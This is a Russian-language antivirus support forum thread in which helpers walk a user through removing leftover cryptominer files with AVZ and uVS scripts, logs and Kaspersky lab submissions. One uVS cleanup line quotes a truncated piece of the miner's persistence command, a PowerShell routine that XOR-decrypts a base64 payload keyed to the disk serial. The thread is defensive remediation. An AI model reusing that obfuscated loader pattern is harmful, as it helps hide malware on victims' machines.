Перейти к содержанию

Походу что-то осталось от майнера


Рекомендуемые сообщения

avz показал много файлов, которых я ранее не видел и они обновляются каждый день, не уверен, что они системные.

Путь: ..\AppData\Local\Temp

Папки: _MEI87802 и _MEI93722

Ссылка на сообщение
Поделиться на другие сайты

@Mark D. Pearlstone,

Ничего не понял, я же прикрепил лог. Ясно, надо было нажать Загрузить, я думал оно загрузить после нажатия Отправить.

CollectionLog-2017.12.14-17.41.zip

Ссылка на сообщение
Поделиться на другие сайты

Здравствуйте!

- Проведите эту процедуру. Полученную ссылку после загрузки карантина virusinfo_auto_имя_вашего_ПК.zip через данную форму напишите в своём в сообщении здесь.

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):
 

begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 ClearQuarantineEx(true);
 QuarantineFile('C:\Program Files\Windows NT\Accessories\task.exe', '');
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.

После выполнения скрипта компьютер перезагрузится.

 - Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com
Полученный ответ сообщите здесь (с указанием номера KLAN)
 
"Пофиксите" в HijackThis:
O4 - HKU\S-1-5-19\..\Run: [OneDriveSetup] C:\Windows\SysWOW64\OneDriveSetup.exe /thfirstsetup (file missing)
O4 - HKU\S-1-5-20\..\Run: [OneDriveSetup] C:\Windows\SysWOW64\OneDriveSetup.exe /thfirstsetup (file missing)
O22 - Task: (disabled) CAM - C:\Program Files (x86)\NZXT\CAM\CAM_V3.exe (file missing)
O22 - Task: (telemetry) \Microsoft\Office\Office 15 Subscription Heartbeat - C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe (file missing)
 
 
WinZip 21.5 [20170910]-->MsiExec.exe /X{CD95F661-A5C4-44F5-A6AA-ECDD91C2410F}
деинсталийте.

Повторите логи по правилам. Для повторной диагностики запустите снова Autologger.
 
+ Скачайте AutorunsVTchecker, распакуйте и запустите. Не закрывайте окно до окончания завершения работы программы.
Ссылка на сообщение
Поделиться на другие сайты

WinZip 21.5 [20170910]-->MsiExec.exe /X{CD95F661-A5C4-44F5-A6AA-ECDD91C2410F}деинсталийте.

Удалить? Как удалить?


https://virusinfo.info/virusdetector/report.php?md5=BC78BEFBE898976BAE9C95F3FDE24488

KLAN-7344322173

Пофиксил, с этим WinZip 21.5 [20170910]-->MsiExec.exe /X{CD95F661-A5C4-44F5-A6AA-ECDD91C2410F} не понял что делать.

 

AutorunsVTchecker запускал.

CollectionLog-2017.12.14-20.24.zip

Ссылка на сообщение
Поделиться на другие сайты

 

 


Удалить? Как удалить?
через установку и удаление программ.

 

 

 


- Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com Полученный ответ сообщите здесь (с указанием номера KLAN)
где ответ?
Ссылка на сообщение
Поделиться на другие сайты

Благодарим за обращение в Антивирусную Лабораторию

Присланные вами файлы были проверены в автоматическом режиме.

В антивирусных базах информация по присланным вами файлам отсутствует:
quarantine.zip

Файлы переданы на исследование. Если результат исследования изменится, мы дополнительно сообщим вам по электронной почте.

Ссылка на сообщение
Поделиться на другие сайты

  1. Скачайте Universal Virus Sniffer (uVS)
  2. Извлеките uVS из архива или из zip-папки. Откройте папку с UVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
  3. Выберите меню "Файл" => "Сохранить полный образ автозапуска". Программа предложит вам указать место сохранения лога в формате "имя_компьютера_дата_сканирования". Лог необходимо сохранить на рабочем столе.

    !!!Внимание.
    Если у вас установлены архиваторы
    WinRAR
    или
    7-Zip
    , то uVS в автоматическом режиме упакует лог в архив, иначе это будет необходимо сделать вам вручную.

  4. Дождитесь окончания работы программы и прикрепите лог к посту в теме.

    !!! Обратите внимание
    , что утилиты необходимо запускать от имени Администратора. По умолчанию в
    Windows XP
    так и есть. В
    Windows Vista
    и
    Windows 7
    администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать
    Запуск от имени Администратора
    , при необходимости укажите пароль администратора и нажмите
    "Да"
    .



 

Ссылка на сообщение
Поделиться на другие сайты

Скачайте Malwarebytes' Anti-Malware. Установите.
На вкладке "Параметры" - "Личный кабинет" ("Settings" - "My Account") нажмите кнопку "Деактивировать ознакомительную Premium-версию".
На вкладке "Проверка" - "Полная проверка" нажмите кнопку "Начать проверку". Дождитесь окончания проверки.
Самостоятельно ничего не удаляйте!!!
Нажмите кнопку "Сохранить результат - Текстовый файл (*.txt)". Имя сохраняемому файлу дайте любое, например, "scan".
Отчёт прикрепите к сообщению.
Подробнее читайте в руководстве.
 


+ Нажмите Win + R, введите powershell и нажимите ОК. Вставьте такую строку в окно и подтвердите клавишей ENTER:

gwmi win32_diskdrive | where {$_.DeviceID -eq '\\.\PHYSICALDRIVE0'} | select Model, Serialnumber >desktop\sn.txt

Файл sn.txt с рабочего стола прикрепите к вашему сообщению.

Ссылка на сообщение
Поделиться на другие сайты

1) MBAM деинсталируйте.

 

2)

  1. Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.
  2. Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
  3. Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:
    ;uVS v4.0.10 [http://dsrt.dyndns.org]
    ;Target OS: NTv10.0
    v400c
    BREG
    deltmp
    zoo F:\STEAM\STEAMAPPS\COMMON\THIS WAR OF MINE\THIS WAR OF MINE V3.0-V3.0.3 PLUS 7 TRAINER.EXE
    ;---------command-block---------
    zoo %SystemDrive%\USERS\USER\APPDATA\LOCAL\TEMP\CHROME_BITS_8804_23662\28.0.0.126_WIN64_PEPPERFLASHPLAYER.CRX3
    delall %SystemDrive%\USERS\USER\APPDATA\LOCAL\TEMP\CHROME_BITS_8804_23662\28.0.0.126_WIN64_PEPPERFLASHPLAYER.CRX3
    delref "%SYSTEMDRIVE%\PROGRAM FILES\WINDOWS NT\ACCESSORIES\TASK.EXE" -COMMAND "FUNCTION DEC([BYTE[]]$CB, [STRING]$PASS){$PB = [SYSTEM.TEXT.ENCODING]::UTF8.GETBYTES($PASS);$S = $PB[0];$J=0;FOR($I = 0; $I -LT $CB.COUNT; $I++){IF($J -GE $PB.COUNT){$J=0} $S = (23 -BAND $S -BOR 152) -BXOR $S;$CB[$I] = $CB[$I] -BXOR $PB[$J] -BXOR $S;$J++}RETURN $CB;}$OBJ = GWMI WIN32_DISKDRIVE | WHERE {$_.DEVICEID -EQ '\\.\PHYSICALDRIVE0'} | SELECT MODEL, SERIALNUMBER;$D = DEC ([SYSTEM.CONVERT]::FROMBASE64STRING('V1IFHP0C9RPSQPQDVJVJQ6A7PUUREDTDJR7IIZFL6G6HPQMOLG6ZCZU26USKVS1AZGT+LFWYGFURTBXRPUUREC9YJR7IIBR+5NF3FE1GZE/ORDHP8L/BTMPNJZ7PI7PEWL/YJ/FSSUSGFCIPMQRIQOLH8HVMDO4IKBXRUMM
    bl 65D86C34814C02569E2AD53FD24E7F61 431616
    zoo %SystemDrive%\PROGRAM FILES\WINDOWS NT\ACCESSORIES\TASK.EXE
    delall %SystemDrive%\PROGRAM FILES\WINDOWS NT\ACCESSORIES\TASK.EXE
    delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.33.5\PSMACHINE.DLL
    delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.33.5\PSMACHINE_64.DLL
    delref I:\AUTORUN0.EXE
    apply
    
    regt 28
    regt 29
    czoo
    restart
  4. В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..."
  5. Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Прошу учесть, что компьютер может быть перезагружен.
  6. После выполнения скрипта зайдите в папку, где распакована утилита uVS найдите архив, имя которого соответствует дате и времени запуска скрипта с префиксом ZOO_ (например: ZOO_2013-06-30_22-04-27.7z)

    Если архив отсутствует, то
    с паролем
    virus
    .

  7. Полученный архив отправьте по адресу newvirus@kaspersky.com
    Полученный ответ сообщите здесь (с указанием номера KLAN)

 

3) Сделайте свежие лог по правилам.
 

Ссылка на сообщение
Поделиться на другие сайты

KLAN-7353442366

Благодарим за обращение в Антивирусную Лабораторию

Присланные вами файлы были проверены в автоматическом режиме.

В антивирусных базах информация по присланным вами файлам отсутствует:
28.0.0.126_WIN64_PEPPERFLASHPLAYER.CRX3.---.txt
TASK.EXE._21D5224E20A4BE7F303AB6C4B9F219D0D70904EE
TASK.EXE._21D5224E20A4BE7F303AB6C4B9F219D0D70904EE.txt
THIS WAR OF MINE V3.0-V3.0.3 PLUS 7 TRAINER.EXE._6E12A56E583E3F62483B578F7CC1FD4923FA0763.txt

В следующих файлах обнаружен вредоносный код, определяемый продуктами с включенной технологией KSN:
THIS WAR OF MINE V3.0-V3.0.3 PLUS 7 TRAINER.EXE._6E12A56E583E3F62483B578F7CC1FD4923FA0763 - UDS:DangerousObject.Multi.Generic

Файлы переданы на исследование. Если результат исследования изменится, мы дополнительно сообщим вам по электронной почте.
 

CollectionLog-2017.12.15-23.55.zip

Ссылка на сообщение
Поделиться на другие сайты

Что с проблемой?

 

 

 


В следующих файлах обнаружен вредоносный код, определяемый продуктами с включенной технологией KSN: THIS WAR OF MINE V3.0-V3.0.3 PLUS 7 TRAINER.EXE._6E12A56E583E3F62483B578F7CC1FD4923FA0763 - UDS:DangerousObject.Multi.Generic
Если не уверены в данном файле, то лучше его удалите. А если уверены, то отправьте через https://virusdesk.kaspersky.ru/ как ложное срабатывание. А если есть лицензия на касперского, то лучше через личный кабинет, тогда гарантированно получите ответ опасен или нет этот файл.
Ссылка на сообщение
Поделиться на другие сайты

Anti-virus Lab replies to your request [VD3][FILE:2][LN:ru] [KLAN-7359392078]

Здравствуйте,

Это было ошибочное срабатывание.
Оно будет исправлено.
Благодарим Вас за помощь.

С уважением,
Рассохин Кирилл, Вирусный аналитик, АО "Лаборатория Касперского"

Ссылка на сообщение
Поделиться на другие сайты

Присоединяйтесь к обсуждению

Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.

Гость
Ответить в этой теме...

×   Вставлено с форматированием.   Вставить как обычный текст

  Разрешено использовать не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отображать как обычную ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставлять изображения напрямую. Загружайте или вставляйте изображения по ссылке.

×
×
  • Создать...